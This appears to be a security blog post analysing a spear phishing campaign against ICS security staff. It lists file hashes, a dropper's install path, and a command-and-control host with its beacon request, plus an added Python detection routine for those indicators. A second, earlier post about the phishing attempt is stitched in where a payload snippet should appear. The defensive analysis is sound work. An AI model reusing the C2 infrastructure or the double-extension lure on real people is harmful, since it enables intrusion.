Analysis of Spear Phishing Malware File


The following is a guest post courtesy of Ned Moran of the Shadowserver Foundation. It is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security.

Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip
Size: 1886505 bytes
MD5:  820B1CD69828983C089370BDC3CF5870

This archive contained an executable with the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe
Size: 2192363 bytes
MD5:  C6B95B178188B8C35D14BED40520E685

When executed in a lab environment this executable installed a Trojan downloader with the following properties:

File: spoolsvr.exe
Size: 73728 bytes
MD5:  5FF3269FACA4A67D1A4C537154AAAD4B
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe

As shown by this VirusTotal report, this downloader was detected by only 7 of 42 antivirus products. The downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:

GET /logo.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: hint.happyforever.com
Connection: Keep-Alive
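As an added example (not part of Ned's analysis), the indicators listed above turned into a small detection routine in Python: it matches proxy-log lines against the staging host, the C2 host and beacon path, and the downloader's User-Agent, and checks file names and MD5s against the hashes above. The log-line format and the sample lines are assumptions constructed for the example.

```python
import re
# Indicators taken from the analysis above (hosts, path, User-Agent, MD5s).
STAGING_HOST = "research.digitalvortex.com"
C2_HOST = "hint.happyforever.com"
C2_PATH = "/logo.html"
C2_USER_AGENT = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; "
                 ".NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; "
                 ".NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)")
KNOWN_BAD_MD5 = {
    "820b1cd69828983c089370bdc3cf5870": "Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip",
    "c6b95b178188b8c35d14bed40520e685": "Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe",
    "5ff3269faca4a67d1a4c537154aaad4b": "spoolsvr.exe",
}
# Document-looking name that really ends in .exe, as with the .pdf.exe dropper above.
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|xls|ppt|txt)\.exe$", re.IGNORECASE)
# Constructed (hypothetical) proxy-log format: src_ip method host path "user-agent"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

def classify_request(line):
    """Return (src_ip, [reasons]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, _method, host, path, ua = m.groups()
    host, reasons = host.lower(), []
    if host == STAGING_HOST:
        reasons.append("download from staging host")
    if host == C2_HOST:
        reasons.append("C2 beacon path" if path == C2_PATH else "known C2 host")
    # The UA is a stock IE6 string, so on its own it is only corroborating evidence.
    if ua == C2_USER_AGENT:
        reasons.append("downloader User-Agent")
    return src, reasons

def scan_proxy_log(lines):
    return [r for r in map(classify_request, lines) if r and r[1]]  # keep only hits

def check_file(name, md5_hex):
    """Flag a file by known-bad MD5 and/or a document-looking double extension."""
    label = KNOWN_BAD_MD5.get(md5_hex.lower())
    reasons = [f"known bad MD5 ({label})"] if label else []
    if DOUBLE_EXT.search(name):
        reasons.append("double extension")
    return reasons

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 6.1)"',
    '10.0.0.7 GET hint.happyforever.com /logo.html "' + C2_USER_AGENT + '"',
    '10.0.0.9 GET research.digitalvortex.com /x.zip "Mozilla/5.0 (Windows NT 5.1)"',
]
```

A beacon hit on the C2 host is the strong signal; the User-Agent alone matches plenty of legitimate IE6-era traffic and should only raise the score of a host or path match.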

The logo.html contained encoded instructions and a payload. A snippet of the response is as follows:


Spear Phishing Attempt

Spear Phishing (image by Cleanplait)

UPDATE: Added picture of email text

Digital Bond recently had a nice little spear phishing attempt, from an email account registered to look like Dale, to a Digital Bond employee.  The attack linked to a probably-malicious .zip file based upon an old research paper that we published.  There are no AV signatures for the payload.  It was a one-shot deal: the nameserver for the domain used in the attack is located on a compromised box.

It’s a bit concerning that a company whose sole focus is securing industrial control systems should be spear phished.  The attacker clearly went to enough trouble to try to understand ICS security lingo to get the employee to open the link, and had to compromise a DNS server.  It is likely that the perpetrator also compromised a second server to serve up the malicious file goodness (the domain server is in Philadelphia, PA for the interested, and may or may not have hosted the malicious file as well).  The DNS records have been updating constantly since we began investigating.

Thankfully the attack was unsuccessful — paranoia pays off.  It is definitely a lesson in ‘be careful what you open’…even if it looks to be coming from Digital Bond (or your boss, as in this case), don’t open a file if you aren’t expecting it…

DP Update – I added the email below. It is text I have written before and I believe the file title is from a paper that Daniel Peck and I wrote for S4 2009. The file that was linked was a .zip. The only thing that was unbelievable was the signature of just “Peterson”.

(Image of the email text, captioned “Bad English”)
